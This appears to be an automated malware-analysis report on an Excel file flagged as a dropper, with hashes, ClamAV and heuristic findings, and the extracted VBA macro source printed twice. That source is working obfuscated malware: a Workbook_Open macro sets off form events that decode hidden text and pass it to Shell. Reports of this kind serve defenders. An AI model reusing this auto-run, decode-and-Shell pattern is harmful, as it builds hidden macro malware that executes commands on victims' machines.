Office (OLE) malware analysis — malicious · 41b23bad6fcaa948

MALICIOUS

Office (OLE)

51.0 KB Created: 2018-10-16 16:44:32 Authoring application: Microsoft Excel First seen: 2019-08-04

MD5: 4e409e9637a96d88e46b6242a54b3d3d SHA-1: e723e32e46f2aa3effa8a4d51b565caffa0fbdf0 SHA-256: 41b23bad6fcaa948ef20dba9a8d4dd1e31e1f6979f6888b49cc6e7d88a02723d

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file is an Excel document containing VBA macros. The Workbook_Open macro is present and triggers a critical heuristic for a Shell() call. This indicates the macro is designed to execute arbitrary commands, likely for downloading and running a secondary payload. The ClamAV detection name further supports its malicious nature as a dropper.

Heuristics 4

ClamAV: Xls.Malware.Dropperx-6923123-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Dropperx-6923123-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3609 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3609 bytes
SHA-256: `091f074eec8bc259b7426546fca18ada1023f7a6d4e1886c025e52a195a03632`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() a2 = "25000" new_report_create a2 End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub new_document1(arg1, ByRef pointA) pointA = 0 ar2 = 1 copyDocument ar2, pointA, arg1 End Sub Sub replace_mask(b1, ByRef minA) If b1 = -1 Then b1 = -1 End If minA = "" If b1 < 1 Then changeDocument UserForm1.outtext, Len(UserForm1.outtext) + b1, minA Else changeDocument UserForm1.outtext, b1, minA End If End Sub Sub task_set_values(ByRef state_max, ByRef maxA, a1) up1 = Len(a1) If state_max <= up1 Then low1 = "" changeDocument a1, state_max, low1 life2 = 1 new_document1 low1, life2 sub2 = "" replace_mask life2 - 2, sub2 maxA = maxA + sub2 state_max = state_max + 1 task_set_values state_max, maxA, a1 End If End Sub Sub doc_enabled() f_stop = "" task_scrub_cpc UserForm1.date1, f_stop With UserForm1 .line = f_stop .TextBox1 = .line End With End Sub Sub task_scrub_cpc(Arg2, ByRef opcode) long1 = 1 opcode = "" task_set_values long1, opcode, Arg2 End Sub Sub changeDocument(pmin, fpSymGetLineFromAddr64, ByRef control) control = Right(Left(pmin, fpSymGetLineFromAddr64), 1) End Sub Sub copyDocument(ByRef second, ByRef Cell1, HANDLE) s = 1 s = Len(UserForm1.outtext) If second < s Then up2 = "" changeDocument UserForm1.outtext, second, up2 If HANDLE <> up2 Then second = second + 1 copyDocument second, Cell1, HANDLE Else Cell1 = second End If End If End Sub 'create module Sub new_report_create(check) UserForm1.price = check End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{A8BABEFE-FD7B-4914-8F41-D701A419C1EE}{7BBB8CE4-9F37-4EAF-B84F-A43F8E3C8F10}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub date1_Change() '28.08.2017 End Sub Private Sub price_Change() 'level text doc_enabled End Sub Private Sub TextBox1_Change() i1 = 40 * 100 a2 = "22" jtask = "54" a2 = "1021" jtask = "57" a2 = "75" a2 = "52" just = i1 - 10 * 400 a2 = "86" a2 = UserForm1.TextBox1 jtask = "7" jtask = "36" If 0 = just Then 'replce1 string2 to n in max Shell a2, just End If jtask = "10" jtask = "33" a2 = "70" a2 = "9" a2 = "21" a2 = "74" End Sub

SHA-256: 091f074eec8bc259b7426546fca18ada1023f7a6d4e1886c025e52a195a03632

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
a2 = "25000"
new_report_create a2
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub new_document1(arg1, ByRef pointA)
pointA = 0
ar2 = 1
copyDocument ar2, pointA, arg1
End Sub
  


Sub replace_mask(b1, ByRef minA)
If b1 = -1 Then
b1 = -1
End If
minA = ""
If b1 < 1 Then
changeDocument UserForm1.outtext, Len(UserForm1.outtext) + b1, minA
Else
changeDocument UserForm1.outtext, b1, minA
End If
End Sub

Sub task_set_values(ByRef state_max, ByRef maxA, a1)
up1 = Len(a1)
If state_max <= up1 Then
low1 = ""
changeDocument a1, state_max, low1
life2 = 1
new_document1 low1, life2
sub2 = ""
replace_mask life2 - 2, sub2
maxA = maxA + sub2
state_max = state_max + 1
task_set_values state_max, maxA, a1
End If
End Sub


Sub doc_enabled()
f_stop = ""
task_scrub_cpc UserForm1.date1, f_stop
With UserForm1
.line = f_stop
.TextBox1 = .line
End With
End Sub

Sub task_scrub_cpc(Arg2, ByRef opcode)
long1 = 1
opcode = ""
task_set_values long1, opcode, Arg2
End Sub














Sub changeDocument(pmin, fpSymGetLineFromAddr64, ByRef control)
control = Right(Left(pmin, fpSymGetLineFromAddr64), 1)
End Sub



Sub copyDocument(ByRef second, ByRef Cell1, HANDLE)
s = 1
s = Len(UserForm1.outtext)
If second < s Then
up2 = ""
changeDocument UserForm1.outtext, second, up2
If HANDLE <> up2 Then
second = second + 1
copyDocument second, Cell1, HANDLE
Else
Cell1 = second
End If
End If
End Sub

'create module

Sub new_report_create(check)
UserForm1.price = check
End Sub







Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A8BABEFE-FD7B-4914-8F41-D701A419C1EE}{7BBB8CE4-9F37-4EAF-B84F-A43F8E3C8F10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub date1_Change()
'28.08.2017
End Sub


Private Sub price_Change()
'level text
doc_enabled
End Sub


Private Sub TextBox1_Change()
i1 = 40 * 100
a2 = "22"
jtask = "54"
a2 = "1021"
jtask = "57"
a2 = "75"
a2 = "52"
just = i1 - 10 * 400
a2 = "86"
a2 = UserForm1.TextBox1
jtask = "7"
jtask = "36"
If 0 = just Then
'replce1 string2 to n in max
Shell a2, just
End If
jtask = "10"
jtask = "33"
a2 = "70"
a2 = "9"
a2 = "21"
a2 = "74"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.